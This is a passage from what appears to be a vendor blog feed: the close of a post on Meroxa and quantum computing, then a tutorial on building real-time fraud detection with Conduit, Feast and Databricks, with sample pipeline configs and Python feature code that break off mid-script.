&lt;p&gt;Quantum computing will &lt;strong&gt;break traditional encryption&lt;/strong&gt;, but it will also introduce &lt;strong&gt;quantum-safe cryptographic methods&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/cybersecurity.png&quot; alt=&quot;Quantum-safe cryptography workflow&quot;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Use Case:&lt;/strong&gt; Secure, &lt;strong&gt;real-time key exchange pipelines&lt;/strong&gt; for quantum encryption systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Future of Meroxa in Quantum Computing&lt;/h3&gt;
&lt;p&gt;As quantum computing moves toward &lt;strong&gt;commercial adoption&lt;/strong&gt;, Meroxa is committed to &lt;strong&gt;expanding its integrations&lt;/strong&gt; with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Quantum-native data connectors&lt;/strong&gt; for IBM, Google, and D-Wave.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Error correction pipelines&lt;/strong&gt; to ensure data reliability.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-time quantum event processing&lt;/strong&gt; for AI-driven applications.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;Meroxa provides &lt;strong&gt;seamless, high-speed data streaming&lt;/strong&gt; for organizations integrating quantum computing into their architectures. By &lt;strong&gt;bridging classical and quantum systems&lt;/strong&gt;, Meroxa ensures businesses can unlock &lt;strong&gt;new computational capabilities&lt;/strong&gt; without disrupting existing workflows. Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real Time Fraud Detection with Meroxa, Feast, and Databricks]]></title><description><![CDATA[Discover how **Meroxa, Feast, and Databricks** power **real-time fraud detection** by integrating **streaming data, AI-driven feature stores, and scalable analytics**. This blog explores how businesses can **prevent fraud instantly**, leveraging **real-time data pipelines, machine learning models, and predictive analytics** to enhance security and compliance. ]]></description><link>https://meroxa.com/blog/real-time-fraud-detection-with-meroxa-feast-and-databricks</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-fraud-detection-with-meroxa-feast-and-databricks</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Mon, 03 Mar 2025 23:26:00 GMT</pubDate><content:encoded>&lt;p&gt;Financial institutions face an ever-present challenge in detecting fraudulent transactions quickly. Today, we’ll showcase how &lt;strong&gt;Conduit&lt;/strong&gt; and &lt;strong&gt;Feast&lt;/strong&gt; can seamlessly work with &lt;strong&gt;Databricks&lt;/strong&gt; to build a scalable, real-time fraud detection system.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Conduit from Meroxa&lt;/strong&gt;: A high-performance platform for data ingestion and transformation, complete with built-in processors.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Feast&lt;/strong&gt;: An open-source &lt;strong&gt;feature store&lt;/strong&gt; for managing features in both offline (batch) and online (low-latency) contexts.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Databricks&lt;/strong&gt;: For large-scale data processing, model training, and real-time serving (via MLflow Model Serving or custom endpoints).&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;Why Conduit?&lt;/h3&gt;
&lt;p&gt;Conduit offers a lightweight yet powerful way to stream and transform your data with minimal overhead. Key benefits:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Declarative Pipelines&lt;/strong&gt;: Define sources, sinks, and transformations via a YAML or JSON config.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Built-in Processors&lt;/strong&gt;: Modify, enrich, or filter records in flight (e.g., masking sensitive PII).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;High Throughput&lt;/strong&gt;: Designed for real-time data pipelines at scale.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Below is a diagram illustrating how Conduit and Feast integrate with Databricks for fraud detection:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/conduit-fraud.png&quot; alt=&quot;Conduit, Feast, and Databricks fraud detection architecture&quot;&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Conduit&lt;/strong&gt; ingests streaming data from transaction sources (e.g., Kafka, databases).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Built-in processors&lt;/strong&gt; within Conduit enrich/cleanse data.&lt;/li&gt;
&lt;li&gt;Conduit writes &lt;strong&gt;offline features&lt;/strong&gt; to the &lt;strong&gt;Feast Offline Store&lt;/strong&gt; (could be S3 or a relational warehouse).&lt;/li&gt;
&lt;li&gt;Conduit can simultaneously push the &lt;strong&gt;latest features&lt;/strong&gt; to the &lt;strong&gt;Feast Online Store&lt;/strong&gt; (like Redis) for low-latency inference.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Databricks&lt;/strong&gt; reads from the Feast offline store, trains the fraud model, and registers it in &lt;strong&gt;MLflow&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Databricks Model Serving&lt;/strong&gt; (or a custom endpoint) hosts the model for real-time scoring.&lt;/li&gt;
&lt;li&gt;Requests for fraud scoring read any updated features from Feast’s &lt;strong&gt;online store&lt;/strong&gt;.&lt;/li&gt;
&lt;/ol&gt;
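&lt;p&gt;The serving path (steps 6 and 7 above) can be sketched in a few lines of Python. Everything here is a stand-in: the dictionary plays the role of Feast&apos;s online store, and the scoring rule is a hypothetical placeholder for the MLflow-served model:&lt;/p&gt;

```python
# Sketch of real-time scoring: fetch the freshest features for an account
# and score them. The dict stands in for Feast's online store (e.g. Redis);
# the rule-based score is a placeholder for the MLflow-served model.
online_store = {
    "acct-42": {"txn_count_1h": 14, "avg_amount_7d": 310.0, "watchlist_flag": True},
}

def score(features: dict) -> float:
    risk = 0.1                         # baseline risk
    if features["watchlist_flag"]:
        risk += 0.5                    # account appears on the watchlist
    if features["txn_count_1h"] > 10:
        risk += 0.3                    # unusually high transaction velocity
    return round(min(risk, 1.0), 2)

features = online_store["acct-42"]     # low-latency online lookup
print(score(features))  # 0.9
```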
&lt;hr&gt;
&lt;h3&gt;Step 1: Conduit Data Pipeline&lt;/h3&gt;
&lt;h4&gt;1.1 Conduit Configuration&lt;/h4&gt;
&lt;p&gt;Assume we have a &lt;strong&gt;Kafka&lt;/strong&gt; topic (&lt;code class=&quot;language-text&quot;&gt;bank_transactions&lt;/code&gt;) containing real-time financial transactions and a &lt;strong&gt;PostgreSQL&lt;/strong&gt; database with watchlist data. Below is an example &lt;strong&gt;conduit.config.yaml&lt;/strong&gt; snippet that ingests from Kafka and writes to S3 (for offline store) and Redis (for online store), using Feast as the consumer reference.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;/pre&gt;&lt;code class=&quot;language-yaml&quot;&gt;
&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v1&quot;&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;sources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;kafkaTransactions&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; kafka
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;brokers&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;broker1:9092,broker2:9092&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;topics&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;bank_transactions&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;consumerGroupID&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;fraud-cg&quot;&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; parseJSON
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; processor.json
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;action&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;unmarshal&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;field&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;value&quot;&lt;/span&gt;

  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; addWatchlistFlag
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; processor.lookup
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Hypothetical config that references a PostgreSQL watchlist&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;dataStore&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgresql://user:pass@db.example.com:5432/bankdb&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;sourceField&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;value.account_id&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;targetField&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;value.watchlist_flag&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;query&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;SELECT account_id, true as watchlist_flag FROM watchlist WHERE account_id = $1&quot;&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;sinks&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;# Sink to offline store (S3, which Feast can read from)&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;s3Offline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; s3
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;bucket&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;feast-offline-store&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;region&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;us-east-1&quot;&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Additional config (credentials, etc.)&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;# Sink to online store (e.g., Redis for Feast)&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;redisOnline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; redis
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;address&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;redis-host:6379&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;myFraudPipeline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;sources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;kafkaTransactions&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;parseJSON&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;addWatchlistFlag&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;sinks&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;s3Offline&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;redisOnline&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Explanation&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;parseJSON&lt;/strong&gt;: A &lt;strong&gt;built-in processor&lt;/strong&gt; that unmarshals the JSON in the Kafka “value” field into a structured object.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;addWatchlistFlag&lt;/strong&gt;: Another built-in processor that queries your PostgreSQL watchlist table to see if &lt;code class=&quot;language-text&quot;&gt;account_id&lt;/code&gt; is flagged. The result is appended as &lt;code class=&quot;language-text&quot;&gt;value.watchlist_flag = true/false&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The pipeline then writes this enriched stream to &lt;strong&gt;two sinks&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;s3Offline&lt;/strong&gt;: So that &lt;strong&gt;Feast&lt;/strong&gt; or &lt;strong&gt;Databricks&lt;/strong&gt; can consume it in batch.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;redisOnline&lt;/strong&gt;: For near real-time lookups (Feast online store).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
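To make the processor chain concrete, here is a sketch, using plain Python dicts with hypothetical field values, of what a single record might look like before and after `parseJSON` and `addWatchlistFlag` run:

```python
import json

# Raw Kafka record: the "value" field arrives as a JSON string (hypothetical payload).
raw_record = {"key": "txn-1001", "value": '{"account_id": "acc-42", "amount": 250.0}'}

# After parseJSON: the value is now a structured object.
parsed = dict(raw_record, value=json.loads(raw_record["value"]))

# After addWatchlistFlag: the lookup result is appended to the value.
# The set below stands in for the PostgreSQL watchlist query.
watchlist = {"acc-42"}
enriched = dict(parsed)
enriched["value"] = dict(parsed["value"],
                         watchlist_flag=parsed["value"]["account_id"] in watchlist)

print(enriched["value"])
# → {'account_id': 'acc-42', 'amount': 250.0, 'watchlist_flag': True}
```

Both sinks then receive the enriched record; neither sees the raw JSON string.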
&lt;h4&gt;1.2 Running Conduit&lt;/h4&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;conduit run &lt;span class=&quot;token parameter variable&quot;&gt;--config&lt;/span&gt; conduit.config.yaml&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Conduit starts streaming transactions from Kafka, applies the processors, and writes to both S3 and Redis. Data now updates continuously in two places:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Offline store&lt;/strong&gt;: Historical features in S3 (e.g., partitioned files of transaction data).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Online store&lt;/strong&gt;: Real-time features in Redis keyed by &lt;code class=&quot;language-text&quot;&gt;account_id&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;Step 2: Managing Features with Feast&lt;/h3&gt;
&lt;h4&gt;2.1 Feast Repository Setup&lt;/h4&gt;
&lt;p&gt;In your &lt;code class=&quot;language-text&quot;&gt;feature_store.yaml&lt;/code&gt;, configure S3 as the &lt;strong&gt;offline store&lt;/strong&gt; and Redis as the &lt;strong&gt;online store&lt;/strong&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;project&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;fraud_project&quot;&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;registry&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;s3://my-bucket/feast/registry.db&quot;&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;provider&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;local&quot;&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;offline_store&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; file
  &lt;span class=&quot;token key atrule&quot;&gt;path&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;s3://feast-offline-store&quot;&lt;/span&gt;   &lt;span class=&quot;token comment&quot;&gt;# where Conduit is writing&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;online_store&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; redis
  &lt;span class=&quot;token key atrule&quot;&gt;connection_string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;redis-host:6379&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;2.2 Define Fraud Feature Views&lt;/h4&gt;
&lt;p&gt;Example: “transaction_features.py”&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; feast &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; Entity&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; FeatureView&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Field
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; feast&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;types &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; Float32&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Int32&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Bool

account &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Entity&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;name&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;account_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; join_keys&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;account_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

transaction_feature_view &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; FeatureView&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
    name&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;transaction_features&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    entities&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;account&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    ttl&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;None&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    schema&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
        Field&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;name&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;amount&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; dtype&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;Float32&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        Field&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;name&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;watchlist_flag&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; dtype&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;Bool&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        Field&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;name&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;transaction_count_last_10m&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; dtype&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;Int32&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token comment&quot;&gt;# ...&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    online&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;True&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;# source=...  (recent Feast versions also require a source, e.g. a FileSource for the S3 path)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When new transactions arrive (through Conduit), they land in S3 and Redis in near real-time. With &lt;strong&gt;Feast&lt;/strong&gt;, you can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Materialize&lt;/strong&gt; historical data from S3 for offline training.&lt;/li&gt;
&lt;li&gt;Keep the same features &lt;strong&gt;fresh&lt;/strong&gt; in Redis for online inference.&lt;/li&gt;
&lt;/ul&gt;
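After registering the feature view (`feast apply`), materialization can be scripted from Python rather than run by hand. A minimal sketch, assuming a configured feature repo; the helper name is ours, while `materialize_incremental` is Feast's own `FeatureStore` method:

```python
from datetime import datetime

def refresh_online_store(store):
    """Incrementally load the newest offline rows into the online store (Redis)."""
    # materialize_incremental picks up where the last materialization run
    # left off, so repeated calls only move the new data.
    store.materialize_incremental(end_date=datetime.utcnow())
```

In production this would typically run on a schedule (e.g., a Databricks job or cron) so the Redis features stay close to what Conduit has landed in S3.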
&lt;hr&gt;
&lt;h3&gt;Step 3: Training a Fraud Detection Model in Databricks&lt;/h3&gt;
&lt;h4&gt;3.1 Pull Historical Features&lt;/h4&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; feast
&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; pandas &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; pd
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; feast &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; FeatureStore

fs &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; FeatureStore&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;repo_path&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;path/to/feature_repo&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# Example: create an entity DataFrame with known fraud labels for training&lt;/span&gt;
entity_df &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; pd&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;DataFrame&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string&quot;&gt;&quot;account_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
